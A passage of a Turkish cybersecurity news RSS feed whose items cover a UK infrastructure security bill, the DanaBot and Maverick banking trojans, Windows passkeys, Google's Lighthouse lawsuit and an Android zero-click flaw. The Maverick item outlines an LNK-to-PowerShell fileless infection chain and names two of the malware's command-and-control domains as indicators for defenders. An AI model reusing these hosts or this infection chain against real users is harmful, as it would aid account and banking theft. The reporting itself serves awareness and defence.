<p data-start="3726" data-end="3863"><strong data-start="3726" data-end="3738"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Birleşik Krallık Kritik Altyapıyı Güçlendirmek İçin Yeni Siber Güvenlik Yasasını Tanıttı: Hastaneler ve Enerji Sistemleri İçin Zorunlu Standartlar Geliyor</title>
<link>https://www.ajansexpres.com.tr/birlesik-krallik-kritik-altyapiyi-guclendirmek-icin-yeni-siber-guvenlik-yasasini-tanitti-hastaneler-ve-enerji-sistemleri-icin-zorunlu-standartlar-geliyor</link>
<guid>https://www.ajansexpres.com.tr/birlesik-krallik-kritik-altyapiyi-guclendirmek-icin-yeni-siber-guvenlik-yasasini-tanitti-hastaneler-ve-enerji-sistemleri-icin-zorunlu-standartlar-geliyor</guid>
<description><![CDATA[ Birleşik Krallık, hastaneler, enerji ağları, su hizmetleri ve ulaşım sistemlerini hedef alan siber saldırıların yıllık 15 milyar sterline yaklaşan ekonomik etkisine karşı kapsamlı bir düzenleme hazırladı. 12 Kasım’da Parlamento’ya sunulan Cyber Security and Resilience Bill, NIS Regulations 2018’in üzerine inşa edilen köklü bir güncelleme niteliği taşıyor. Yasa, orta ve büyük ölçekli yönetilen hizmet sağlayıcılarına zorunlu güvenlik standartları getiriyor, kritik tedarikçilerin denetlenmesini sağlıyor ve NCSC’ye 24 saat içinde bildirim zorunluluğu getirerek Birleşik Krallık’ın dijital savunmasını yeniden şekillendiriyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202511/image_870x580_6915316303c55.webp" length="32186" type="image/jpeg"/>
<pubDate>Thu, 13 Nov 2025 04:18:08 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>uk cyber security and resilience bill nedir, britanya kritik altyapı güvenliği, ncsc bildirim zorunluluğu, nis regulations 2018 güncellemeleri</media:keywords>
<content:encoded><![CDATA[<p>Birleşik Krallık hükümeti, kritik hizmetlerde yaşanan kesintilerin ardından <strong data-start="907" data-end="945">Cyber Security and Resilience Bill</strong> adlı yeni düzenlemeyi Parlamento’ya sundu. Yasa, özellikle NHS sistemlerindeki büyük aksaklıklar ve Savunma Bakanlığı maaş sisteminin hedef alınması gibi olayların ardından altyapı güvenliğini artırmayı amaçlıyor.</p>
<p></p>
<p data-start="1161" data-end="1518"><strong data-start="1161" data-end="1207">Kritik Hizmetler İçin Geliştirilmiş Koruma</strong><br data-start="1207" data-end="1210">Bilim, İnovasyon ve Teknoloji Bakanlığı, yeni yasanın hastaneler, enerji ve su altyapıları ile ulaşım ağlarında siber saldırı riskini azaltmayı hedeflediğini açıkladı. Yetkililer, artan tehditlere karşı kesintilerin önlenmesinin ve hizmet sürekliliğinin garanti altına alınmasının öncelik olduğunu vurguladı.</p>
<p data-start="1520" data-end="1960"><strong data-start="1520" data-end="1576">Yönetilen Hizmet Sağlayıcılarına Zorunlu Standartlar</strong><br data-start="1576" data-end="1579">Yasa, ilk kez olmak üzere orta ve büyük ölçekli <strong data-start="1627" data-end="1702">IT yönetimi, yardım masası hizmetleri ve siber güvenlik sağlayıcılarına</strong> bağlayıcı güvenlik standartları getiriyor. Bu kuruluşlar, olaylara müdahale planları hazırlamak ve önemli siber olayları <strong data-start="1824" data-end="1882">24 saat içinde NCSC ve düzenleyici kurumlara bildirmek</strong> zorunda olacak. Ayrıntılı raporların ise 72 saat içinde iletilmesi gerekiyor.</p>
<p data-start="1962" data-end="2439"><strong data-start="1962" data-end="2010">Tedarik Zinciri Güvenliği İçin Yeni Yetkiler</strong><br data-start="2010" data-end="2013">Düzenleyiciler, sağlık tanı laboratuvarları veya su şirketleri için kimyasal tedarikçiler gibi kritik konumda bulunan tedarikçileri belirleyerek bu kuruluşlara asgari güvenlik standartlarını uygulama zorunluluğu getirebilecek. Ayrıca Teknoloji Bakanı, ulusal güvenlik tehdidi durumunda Thames Water veya NHS Trust’ları gibi kurumlara artırılmış izleme ya da sistem izolasyonu gibi adımlar almaları yönünde talimat verebilecek.</p>
<p data-start="2441" data-end="2754"><strong data-start="2441" data-end="2497">Yeni Ekonomik Yaptırımlar ve Kapsamın Genişletilmesi</strong><br data-start="2497" data-end="2500">Yasa, ciddi ihlaller için ciroya dayalı para cezaları getirerek uyumsuzluğu mali açıdan daha maliyetli hâle getiriyor. Düzenleme; veri merkezleri ile akıllı enerji altyapısı yöneten kuruluşları, örneğin elektrikli araç şarj noktalarını da kapsama alıyor.</p>
<p data-start="2756" data-end="3229"><strong data-start="2756" data-end="2815">Araştırmalar Finansal Etkilerin Boyutunu Ortaya Koyuyor</strong><br data-start="2815" data-end="2818">Hükümetin paylaştığı bağımsız çalışmalara göre Birleşik Krallık’ta ortalama bir “önemli siber saldırının” maliyeti 190 bin sterlini aşıyor ve toplam yıllık zarar yaklaşık <strong data-start="2989" data-end="3012">14.7 milyar sterlin</strong> seviyesine ulaşıyor. Geçtiğimiz Eylül ayında Jaguar Land Rover’ı hedef alan saldırının en az <strong data-start="3106" data-end="3128">1.9 milyar sterlin</strong> zarara yol açarak “ülke tarihinin en maliyetli siber saldırısı” olarak kayıtlara geçtiği belirtildi.</p>
<p data-start="3231" data-end="3398">Britanya Bütçe Sorumluluğu Ofisi ise kritik altyapıya yönelik büyük bir saldırının devlet borçlanmasını geçici olarak <strong data-start="3349" data-end="3370">30 milyar sterlin</strong> artırabileceğini öngörüyor.</p>
<p data-start="3400" data-end="3682">Ülkede ayrıca telekom operatörleri, dolandırıcıların telefon numarası spoofing yöntemini ortadan kaldırmak için sistemlerini bir yıl içinde güncelleme taahhüdünde bulundu. Hükümet daha önce de kritik altyapı ve kamu kurumlarının fidye ödemesini yasaklamayı planladığını açıklamıştı.</p>
<p data-start="3684" data-end="3841"><strong data-start="3684" data-end="3696"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Altı Aylık Sessizliğin Ardından DanaBot Yeniden Ortaya Çıktı: Yeni Sürüm Windows Sistemlerini Tor Tabanlı Altyapıyla Hedef Alıyor</title>
<link>https://www.ajansexpres.com.tr/alti-aylik-sessizligin-ardindan-danabot-yeniden-ortaya-cikti-yeni-surum-windows-sistemlerini-tor-tabanli-altyapiyla-hedef-aliyor</link>
<guid>https://www.ajansexpres.com.tr/alti-aylik-sessizligin-ardindan-danabot-yeniden-ortaya-cikti-yeni-surum-windows-sistemlerini-tor-tabanli-altyapiyla-hedef-aliyor</guid>
<description><![CDATA[ Dünya çapında yapılan Operation Endgame operasyonuyla altyapısı çökertilen DanaBot zararlı yazılımı, altı aylık aranın ardından yeniden görülmeye başlandı. Zscaler ThreatLabz araştırmacıları, Tor uzantılı komuta-kontrol alanları ve “backconnect” düğümleri kullanan 669 numaralı yeni bir sürüm tespit etti. Bankacılık truva atı olarak bilinen DanaBot’un BTC, ETH, LTC ve TRX adresleri üzerinden çalınan fonları aktardığı, zararlının geçmişte olduğu gibi e-posta, SEO zehirlemesi ve malvertising yoluyla ilk erişim sağladığı bildirildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202511/image_870x580_6915314dbadcf.webp" length="46210" type="image/jpeg"/>
<pubDate>Thu, 13 Nov 2025 04:17:53 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>danabot yeni sürüm özellikleri, operation endgame etkisi, zscaler danabot analizi, windows danabot enfeksiyon yolları</media:keywords>
<content:encoded><![CDATA[<p>Zscaler ThreatLabz ekibi, <strong data-start="739" data-end="760">Operation Endgame</strong> kapsamında altyapısı hedef alınan DanaBot’un aylar süren kesintinin ardından yeniden aktif hâle geldiğini duyurdu. Analizlerde, tehdit aktörlerinin <strong data-start="909" data-end="923">669 sürümü</strong> olarak adlandırılan yeni varyantı kullandığı ve komuta-kontrol iletişiminin <strong data-start="1000" data-end="1034">Tor tabanlı .onion alan adları</strong> ile “backconnect” düğümlerine taşındığı belirlendi.</p>
<p></p>
<p data-start="1088" data-end="1381"><strong data-start="1088" data-end="1123">Kripto Adresleri Tekrar Devrede</strong><br data-start="1123" data-end="1126">Araştırmacılar, tehdit aktörlerinin çalınan fonları aktarmak için Bitcoin, Ethereum, Litecoin ve TRON üzerinde yeni cüzdan adresleri kullandığını tespit etti. Bu adreslerin, güncel kampanyalarda yürütülen finansal hırsızlıklara işaret ettiği ifade edildi.</p>
<p data-start="1383" data-end="1857"><strong data-start="1383" data-end="1437">Bankacılık Truva Atından Modüler Yükleyiciye Evrim</strong><br data-start="1437" data-end="1440">İlk kez Proofpoint tarafından tanımlanan DanaBot, e-posta ve malvertising ile dağıtılan <strong data-start="1528" data-end="1571">Delphi tabanlı bir bankacılık truva atı</strong> olarak biliniyordu. Zamanla modüler bir yapıya dönüşerek tarayıcılarda bulunan kimlik bilgilerini, kripto cüzdan verilerini ve diğer hassas bilgileri hedef alan bir bilgi hırsızına evrildi. Ayrıca <strong data-start="1769" data-end="1793">malware-as-a-service</strong> modeliyle kiralanarak geniş saldırı kampanyalarında kullanıldı.</p>
<p data-start="1859" data-end="2313"><strong data-start="1859" data-end="1904">Operation Endgame’in Etkisi Sınırlı Kaldı</strong><br data-start="1904" data-end="1907">Mayıs ayında yürütülen uluslararası operasyon, Danabot altyapısında ciddi bozulmalara neden olmuş ve bazı dijital varlıklara el konulmuş olsa da, Zscaler’ın bulguları operatörlerin çekirdek kadrosunun yakalanmaması nedeniyle faaliyete geri dönebildiğini gösteriyor. Araştırmacılara göre zararlının geri dönüşü, finansal motivasyonun sürdüğü durumlarda operasyonel dayanıklılığın korunduğunu ortaya koyuyor.</p>
<p data-start="2315" data-end="2622"><strong data-start="2315" data-end="2354">Yayılma Yöntemleri ve Kurumsal Risk</strong><br data-start="2354" data-end="2357">Güncel enfeksiyonlarda, zararlının ilk erişimi genellikle <strong data-start="2415" data-end="2441">kötü amaçlı e-postalar</strong>, <strong data-start="2443" data-end="2462">SEO zehirlemesi</strong> ve <strong data-start="2466" data-end="2482">malvertising</strong> kampanyalarıyla sağladığı bildirildi. Bu yöntemlerle elde edilen erişimler bazı durumlarda fidye yazılımı saldırılarına da zemin oluşturdu.</p>
<p data-start="2624" data-end="2816">Kuruluşların, Zscaler tarafından yayımlanan güncel <strong data-start="2675" data-end="2726">IoC listelerini engelleme kurallarına ekleyerek</strong> ve güvenlik araçlarını güncelleyerek olası saldırılara karşı korunabileceği ifade edildi.</p>
<p data-start="2818" data-end="2950"><strong data-start="2818" data-end="2830"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Windows 11’e Gelen Yeni Güvenlik Güncellemesi 1Password ve Bitwarden ile Üçüncü Taraf Yerel Passkey Yönetimini Resmen Destekliyor</title>
<link>https://www.ajansexpres.com.tr/windows-11e-gelen-yeni-guvenlik-guncellemesi-1password-ve-bitwarden-ile-ucuncu-taraf-yerel-passkey-yoenetimini-resmen-destekliyor</link>
<guid>https://www.ajansexpres.com.tr/windows-11e-gelen-yeni-guvenlik-guncellemesi-1password-ve-bitwarden-ile-ucuncu-taraf-yerel-passkey-yoenetimini-resmen-destekliyor</guid>
<description><![CDATA[ Microsoft, Kasım 2025 güvenlik güncellemesiyle Windows 11’e üçüncü taraf yerel passkey yönetimi desteği ekledi. 1Password ve Bitwarden’ın ilk entegre uygulamalar olarak sisteme bağlanmasıyla birlikte kullanıcılar artık FIDO2/WebAuthn standartlarına dayanan anahtarsız kimlik doğrulamayı Microsoft Password Manager haricinde farklı yöneticilerle de kullanabiliyor. Yeni API sayesinde passkey oluşturma, doğrulama ve saklama süreçleri Windows Hello korumasıyla yürütülürken, çok cihazlı senkronizasyon ve Azure tabanlı güvenlik katmanları da ekleniyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202511/image_870x580_6915312942aef.webp" length="40078" type="image/jpeg"/>
<pubDate>Thu, 13 Nov 2025 04:17:38 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>windows 11 passkey desteği, 1password bitwarden entegrasyonu, microsoft password manager nedir, passkey windows hello doğrulama</media:keywords>
<content:encoded><![CDATA[<p>Microsoft, Windows 11’de <strong data-start="754" data-end="818">yerel passkey yönetimi için üçüncü taraf uygulama desteğinin</strong> kullanıma sunulduğunu açıkladı. Yeni özellik, Kasım 2025 güvenlik güncellemesiyle sisteme eklendi ve 1Password ile Bitwarden ilk entegre yöneticiler olarak yerini aldı.</p>
<p></p>
<p data-start="989" data-end="1315"><strong data-start="989" data-end="1034">Yeni API ile Şifre Gerektirmeyen Girişler</strong><br data-start="1034" data-end="1037">Windows güvenlik ekibi, 1Password ve Bitwarden geliştiricileriyle birlikte çalışarak passkey kullanımını kolaylaştıran bir API hazırladı. Passkey yapısı, FIDO2/WebAuthn standartları doğrultusunda özel–açık anahtar kriptografisini kullanarak parola ihtiyacını ortadan kaldırıyor.</p>
<p data-start="1317" data-end="1734"><strong data-start="1317" data-end="1355">Windows Hello ile Doğrulama Süreci</strong><br data-start="1355" data-end="1358">Passkey destekli bir siteye veya uygulamaya kayıt sırasında Windows, kullanıcı için bir anahtar çifti oluşturuyor. Özel anahtar, kullanıcı tercihi doğrultusunda Microsoft Password Manager, 1Password veya Bitwarden üzerinde güvenli şekilde saklanıyor. Giriş denemelerinde Windows, kullanıcının kimliğini <strong data-start="1661" data-end="1705">PIN veya biyometri tabanlı Windows Hello</strong> doğrulamasıyla teyit ediyor.</p>
<p data-start="1736" data-end="2105"><strong data-start="1736" data-end="1791">Microsoft Password Manager Artık Windows’a Yerleşik</strong><br data-start="1791" data-end="1794">Microsoft, Edge üzerinde çalışan Microsoft Password Manager eklentisini Windows 11’e doğrudan entegre ederek kullanıcıların tercih ettikleri yöneticiyi seçmesini sağladı. Şirket, sistemdeki passkey işlemlerinin Azure Managed HSM, Azure Confidential Compute ve Azure Confidential Ledger ile korunduğunu belirtti.</p>
<p data-start="2107" data-end="2389"><strong data-start="2107" data-end="2154">1Password ve Bitwarden Entegrasyonu Başladı</strong><br data-start="2154" data-end="2157">Bitwarden, 2023’ten bu yana passkey desteği sunarken 2024’te “Log in with Passkeys” özelliğini yayımlamıştı. Şirket, Windows 11 entegrasyonunun beta aşamasında olduğunu ve geniş ölçekli testlerle kararlılığın artırılacağını duyurdu.</p>
<p data-start="2391" data-end="2568">Microsoft, passkey kullanımının taşınabilirlik, kullanıcı kolaylığı ve phishing’e dayanıklılık gibi avantajları nedeniyle Windows ekosisteminde yaygınlaştırılacağını ifade etti.</p>
<p data-start="2570" data-end="2712"><strong data-start="2570" data-end="2582"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Google’ın Federal Dava Hamlesi Lighthouse Ağını Hedef Aldı: ABD Genelinde Milyonları Etkileyen SMS Yol Ücreti Dolandırıcılığına Kapatma Adımı</title>
<link>https://www.ajansexpres.com.tr/googlein-federal-dava-hamlesi-lighthouse-agini-hedef-aldi-abd-genelinde-milyonlari-etkileyen-sms-yol-ucreti-dolandiriciligina-kapatma-adimi</link>
<guid>https://www.ajansexpres.com.tr/googlein-federal-dava-hamlesi-lighthouse-agini-hedef-aldi-abd-genelinde-milyonlari-etkileyen-sms-yol-ucreti-dolandiriciligina-kapatma-adimi</guid>
<description><![CDATA[ Google, ABD genelinde E-ZPass ve USPS adı kullanılarak yürütülen SMS yol ücreti ve teslimat dolandırıcılıklarında kullanılan Çin merkezli “Lighthouse” adlı phishing-as-a-service platformunu kapatmak için federal mahkemeye başvurdu. Şirket, 120 ülkede 1 milyondan fazla kişinin etkilendiğini, sahte ödeme bildirimleriyle kredi kartı bilgilerinin çalındığını ve platformun RICO, Lanham Act ve Computer Fraud and Abuse Act kapsamında suç işlediğini belirtiyor. Cisco Talos ve Netcraft araştırmalarında, Lighthouse’ın tehdit aktörlerine iMessage ve RCS üzerinden sahte iletiler gönderen gelişmiş altyapı sunduğu, binlerce typosquatted alan adının kullanıldığı ve operasyonun 2025’e kadar sürdüğü tespit edildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202511/image_870x580_6915311cca86f.webp" length="75914" type="image/jpeg"/>
<pubDate>Thu, 13 Nov 2025 04:15:25 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>google lighthouse davası, sms yol ücreti dolandırıcılığı, ezpass phishing kitleri, wang duo yu lighthouse bağlantısı</media:keywords>
<content:encoded><![CDATA[<p>Google, ABD’de milyonları etkileyen sahte E-ZPass ve USPS bildirimleriyle yürütülen <strong data-start="981" data-end="1104">SMS tabanlı yol ücreti ve teslimat dolandırıcılıklarının odağındaki “Lighthouse” adlı phishing-as-a-service platformuna</strong> karşı federal bir dava açıldığını açıkladı. Dilekçede, saldırganların kredi kartı bilgilerini toplamak için kitleri kullandığı ve altyapının dünya genelinde yaygın biçimde dağıtıldığı vurgulandı.</p>
<p></p>
<p data-start="1302" data-end="1730"><strong data-start="1302" data-end="1352">Google Suçlamaları Federal Yasalara Dayandırdı</strong><br data-start="1352" data-end="1355">Davada, Lighthouse platformuna yönelik iddialar <strong data-start="1403" data-end="1464">Racketeer Influenced and Corrupt Organizations Act (RICO)</strong>, <strong data-start="1466" data-end="1480">Lanham Act</strong> ve <strong data-start="1484" data-end="1516">Computer Fraud and Abuse Act</strong> kapsamında ele alındı. Google, sahte USPS ve E-ZPass mesajlarıyla yürütülen kampanyalarda kullanılan altyapının son iki yılda ABD’de 115 milyon ödeme kartını hedef alan dolandırıcılıklarda rol oynadığını kaydetti.</p>
<p data-start="1732" data-end="2168"><strong data-start="1732" data-end="1789">Phishing Kitleri ABD’de Çok Sayıda Eyaleti Hedef Aldı</strong><br data-start="1789" data-end="1792">Google’ın değerlendirmelerine göre Lighthouse, kullanıcıları sahte borç bildirimleriyle yanıltan hazır şablonlar ve barındırma hizmetleri sağlıyor. Cisco Talos’un araştırması, 2024 Ekim’inden itibaren Washington, Florida, Pennsylvania, Virginia, Texas, Ohio, Illinois ve Kansas gibi eyaletlerde binlerce alan adının kullanıldığı geniş çaplı bir smishing trafiğine işaret etti.</p>
<p data-start="2170" data-end="2518"><strong data-start="2170" data-end="2215">Lighthouse’ın Çinli Operatörle Bağlantısı</strong><br data-start="2215" data-end="2218">Talos ve Netcraft, platformun, “Wang Duo Yu” takma adını kullanan Çin merkezli bir operatör tarafından geliştirilen smishing kitleriyle bağlantılı olduğunu bildirdi. Operatörün Telegram kanalları üzerinden kitleri sattığı ve yıllık 1.588 dolara kadar yükselen abonelik modelleri sunduğu ifade edildi.</p>
<p data-start="2520" data-end="2788"><strong data-start="2520" data-end="2569">Sahte Google Markalama Kullanımı Dikkat Çekti</strong><br data-start="2569" data-end="2572">Google, en az <strong data-start="2586" data-end="2621">107 sahte web sitesi şablonunda</strong> Google giriş ekranlarının kopyalandığını belirledi. Açıklamada, “Markalarımız izinsiz kullanılarak insanların bu sitelere inanması sağlanıyor.” ifadesine yer verildi.</p>
<p data-start="2790" data-end="3150"><strong data-start="2790" data-end="2830">ABD Politikalarına Destek Açıklaması</strong><br data-start="2830" data-end="2833">Google ayrıca dolandırıcılıklarla mücadele amacı taşıyan yeni ABD politikalarına destek verdi. <strong data-start="2928" data-end="2941">GUARD Act</strong>, <strong data-start="2943" data-end="2979">Foreign Robocall Elimination Act</strong> ve <strong data-start="2983" data-end="2995">SCAM Act</strong> kapsamında yaşlı bireylerin korunması, yabancı kaynaklı robocall trafiğinin engellenmesi ve ulusal düzeyde mücadele stratejisi oluşturulması hedefleniyor.</p>
<p data-start="3152" data-end="3325">Şirket, yapay zekâ destekli dolandırıcılık tespit sistemlerini genişlettiğini ve kullanıcıları bu tür oltalama girişimlerine karşı bilinçlendirmeye devam edeceğini açıkladı.</p>
<p data-start="3327" data-end="3458"><strong data-start="3327" data-end="3339"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>WhatsApp’ta Gizlenen “Maverick” Tuzağı: ZIP’teki .LNK’e Tıklayanların Hesapları Hemen Ele Geçiriliyor — Siz de Hemen Kontrol Edin!</title>
<link>https://www.ajansexpres.com.tr/whatsappta-gizlenen-maverick-tuzagi-zipteki-lnke-tiklayanlarin-hesaplari-hemen-ele-geciriliyor-siz-de-hemen-kontrol-edin</link>
<guid>https://www.ajansexpres.com.tr/whatsappta-gizlenen-maverick-tuzagi-zipteki-lnke-tiklayanlarin-hesaplari-hemen-ele-geciriliyor-siz-de-hemen-kontrol-edin</guid>
<description><![CDATA[ Güvenlik araştırmacıları, Brezilya merkezli yeni bir banka trojanı kampanyasının WhatsApp aracılığıyla ZIP içindeki .LNK dosyalarıyla hızla yayıldığını bildirdi; Maverick olarak adlandırılan kötü amaçlı yazılım, dosyasız (fileless) zincir, Donut ile şifrelenmiş shellcode, .NET loader ve WPPConnect/Selenium tabanlı WhatsApp infector modülleriyle çalışıyor. Araştırmacılar, C2 kontrolleri, coğrafi filtreleme, otomatik mesaj yayılımı ve bankacılık/kripto oturumlarını hedefleyen izleme yetenekleri nedeniyle hassas kurum ve kullanıcıların uyanık olması gerektiğini vurguluyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202511/image_870x580_69145b87d3bbe.webp" length="21574" type="image/jpeg"/>
<pubDate>Wed, 12 Nov 2025 13:04:09 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>whatsapp maverick nasıl yayıldı, maverick banka trojanı ioc listesi, whatsapp zip lnkk tuzağı belirtileri, kurumlar whatsapp infector savunma</media:keywords>
<content:encoded><![CDATA[<p>Kaspersky, Trend Micro, Sophos ve diğer güvenlik ekiplerinin ortak analizleri, WhatsApp üzerinden gönderilen ZIP arşivleri içindeki kötü amaçlı <strong data-start="898" data-end="906">.LNK</strong> dosyalarının tıklanmasıyla başlatılan yeni bir kampanyayı ortaya çıkardı; tehdit aktörleri tarafından <strong data-start="1009" data-end="1023">“Maverick”</strong> olarak isimlendirilen trojan, kurulduğunda kapsamlı veri toplama ve uzaktan kontrol yetenekleri sergiliyor.</p>
<p data-start="1135" data-end="1549"><strong data-start="1135" data-end="1160">İlk Bulaşma ve Zincir</strong><br data-start="1160" data-end="1163">Kampanya, kurbana WhatsApp mesajı ile ulaştırılan ZIP dosyası içindeki LNK dosyasının çalıştırılmasıyla başlıyor; LNK aracılığıyla cmd/PowerShell komutları bellek içinde yürütülüyor, Donut ile paketlenmiş shellcode ve gömülü .NET yürütülebilirleri C2’den indirilerek diske minimum yazma ile işleniyor. Araştırmacılar, bu akışın tamamen fileless olacak şekilde tasarlandığını belirtti.</p>
<p data-start="1551" data-end="2110"><strong data-start="1551" data-end="1585">Teknik Özellikler ve Hedefleme</strong><br data-start="1585" data-end="1588">Maverick, indirme isteklerinde özel <strong data-start="1624" data-end="1638">User-Agent</strong> ve HMAC tabanlı bir “API Key” doğrulaması uygulayarak doğrudan C2 dışında normal indirme araçlarının başarısız olmasını sağlıyor. İndirme ve decrypt süreçlerinde XOR/anahtar sonek boyutu yöntemi, .NET yükleyicinin ise kontrol akışını düzleştirme (control-flow flattening) ve dolaylı çağrılarla obfuscation uyguladığı rapor edildi. Yazılım kurbanın zaman dilimi, dil, bölge ve tarih formatını kontrol ederek çoğunlukla Brezilya’da çalışan modülleri aktif hale getiriyor.</p>
<p data-start="2112" data-end="2540"><strong data-start="2112" data-end="2144">Otomatik Yayılma Mekanizması</strong><br data-start="2144" data-end="2147">Maverick’in en zararlı özelliklerinden biri, ele geçirilen WhatsApp oturumlarını WPPConnect ve Selenium kullanarak otomatik mesaj gönderme ve ZIP/.LNK dosyalarını hızla yayma yeteneği; bu durum tek bir ele geçirilmiş hesap üzerinden büyük ölçekli yayılım riskini doğuruyor. Araştırmacılar ilk 10 gün içinde sadece Brezilya’da 62 binin üzerinde engellenmiş deneme tespit ettiklerini bildirdi.</p>
<p data-start="2542" data-end="2987"><strong data-start="2542" data-end="2593">Bankacılık Fonksiyonları ve Agent Yetkinlikleri</strong><br data-start="2593" data-end="2596">Ana banker modülü (Maverick Agent) tarayıcıları izleyerek 26 Brezilya bankası, 6 kripto borsası ve 1 ödeme platformunu hedef alıyor; ekran görüntüsü alma, keylogger, pencere/işlem kontrolü, phishing üstü pencereler oluşturma ve oturum bilgilerini sızdırma gibi işlevleri bulunuyor. İletişim SSL tünelli WatsonTCP ile sağlanıyor; araştırmacılar C2 host örnekleri ve API yolları tespit etti.</p>
<p><img src="https://beykozunsesi.com.tr/uploads/images/202511/image_870x_69145472aadda.webp" alt=""></p>
<p data-start="2989" data-end="3612"><strong data-start="2989" data-end="3040">Tespit Sinyalleri (Yüksek Seviye IoC Örnekleri)</strong><br data-start="3040" data-end="3043">Araştırmacılar uyarı amaçlı şu tespit sinyallerini paylaştı: ZIP içinden çıkan veya çalıştırılan .lnk dosyaları, PowerShell tarafından başlatılan şifrelenmiş/encoded script yürütmeleri, kısa sürede çok sayıda kişiye/ gruba otomatik mesaj gönderen WhatsApp Web oturumları ve Kaspersky/Trend Micro/Sophos gibi ürünlerde görülen EDR/AV uyarıları. Ayrıca analizlerde geçen bazı C2/URL örnekleri: sorvetenopote.com (api/v1/...), casadecampoamazonas.com. (Bu liste ayrıntılı IoC’ler içermeyen örnek amaçlıdır; SOC ekipleri özgün raporlardaki IoC listelerini kullanmalıdır.)</p>
<p><img src="https://beykozunsesi.com.tr/uploads/images/202511/image_870x_69145471e6298.webp" alt=""></p>
<p data-start="3614" data-end="4214"><strong data-start="3614" data-end="3637">Savunma ve Öneriler</strong><br data-start="3637" data-end="3640">Araştırmacılar bireylere bilinmeyen ZIP ve .LNK eklerini açmamalarını, WhatsApp bağlı cihazlarını düzenli kontrol etmelerini ve tanımadıkları bağlantıları kaldırmalarını tavsiye etti. Kurumlara ise PowerShell izleme, EDR davranış analizleri, şüpheli ağ trafiği ve anormal WhatsApp Web aktivitelerinin takibi, IoC’lerin güncel kaynaklardan çekilip bloklanması ve etkilenen makinelerin izole edilerek IR süreçlerinin başlatılması önerildi. Yasal yükümlülükler çerçevesinde finans kuruluşlarının ve etkilenen kullanıcıların ilgili bildirimleri yapması gerektiği hatırlatıldı.</p>
<p data-start="4216" data-end="4690"><strong data-start="4216" data-end="4241">Kaynak ve Analiz Notu</strong><br data-start="4241" data-end="4244">Kaspersky (SecureList), Trend Micro, Sophos, Broadcom, BlueVoyant ve bağımsız güvenlik araştırma gruplarının raporları üzerinde yapılan analizler, Maverick’in Coyote benzeri kod örtüşmeleri içerdiğini; ancak mimari ve dağıtım zincirinin yeni ve modüler olduğunu gösteriyor. Teknik raporlar, IoC listeleri ve örnek yakalama verileri ilgili laboratuvar bültenlerinde yer alıyor; haber metninde saldırı kodları veya eylemsel komutlar paylaşılmadı.</p>
<p data-start="4692" data-end="4848"></p>
<p></p>
<p><b>Kaynak: Beykozun Sesi</b></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Android 0&#45;click RCE açığı CVE&#45;2025&#45;48593: Google kritik güvenlik uyarısı yayımladı</title>
<link>https://www.ajansexpres.com.tr/android-0-click-rce-acigi-cve-2025-48593-google-kritik-guvenlik-uyarisi-yayimladi</link>
<guid>https://www.ajansexpres.com.tr/android-0-click-rce-acigi-cve-2025-48593-google-kritik-guvenlik-uyarisi-yayimladi</guid>
<description><![CDATA[ Google, System bileşeninde kullanıcı etkileşimi gerektirmeyen (0-click) uzaktan kod çalıştırma açığını (CVE-2025-48593, A-374746961) bildirdi. Saldırganların özel hazırlanmış paketler veya sideload edilmiş kötü amaçlı APK’larla cihazda uzaktan kod çalıştırabildiği belirtildi. Etkilenen sürümler Android 13, 14, 15 ve 16 olarak açıklandı. Ayrıca Android 16’da ayrıcalık yükseltme zafiyeti CVE-2025-48581 (A-428945391) tespit edildi. Google, kullanıcıların güvenlik güncellemelerini gecikmeden yüklemeleri gerektiğini vurguladı. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202511/image_870x580_69124273a5dfb.webp" length="35392" type="image/jpeg"/>
<pubDate>Mon, 10 Nov 2025 09:48:34 +0300</pubDate>
<dc:creator>HABER SEFİ</dc:creator>
<media:keywords>android 0click rce açığı, cve2025-48593 detayları, android 16 eop zafiyeti, google güvenlik güncellemesi önerileri</media:keywords>
<content:encoded><![CDATA[<p data-start="776" data-end="1054">Google, System bileşeninde keşfedilen ve kullanıcı müdahalesi olmadan tetiklenebilen kritik bir uzaktan kod çalıştırma (RCE) zafiyetini <strong data-start="933" data-end="965">CVE-2025-48593 (A-374746961)</strong> olarak duyurdu. Açığın etkilendiği sürümler Android 13, 14, 15 ve 16 olarak açıklandı.</p>
<p data-start="1056" data-end="1393"><strong data-start="1056" data-end="1088">Zafiyetin Teknik Ayrıntıları</strong><br data-start="1088" data-end="1091">Google tarafından yayımlanan özet rapora göre, açığın kök nedeni hatalı input-parsing sürecinde oluşan <strong data-start="1194" data-end="1238">bellek bozulması (heap/stack corruption)</strong> olarak değerlendiriliyor. Bu durum, kötü niyetli verilerin sistem servisleri veya arka plan işlemleri aracılığıyla işlenmesi sırasında tetiklenebiliyor.</p>
<p data-start="1395" data-end="1727"><strong data-start="1395" data-end="1431">Saldırı Vektörleri ve Etki Alanı</strong><br data-start="1431" data-end="1434">Saldırganların özel hazırlanmış paketler veya <strong data-start="1480" data-end="1520">sideload edilmiş kötü amaçlı APK’lar</strong> kullanarak cihazlarda uzaktan kod çalıştırma yetkisi elde edebildiği bildirildi. Açığın, IPC/Binder çağrıları, medya ve ağ parser’ları gibi arka plan bileşenleri üzerinden tetiklenebilmesi dikkat çekiyor.</p>
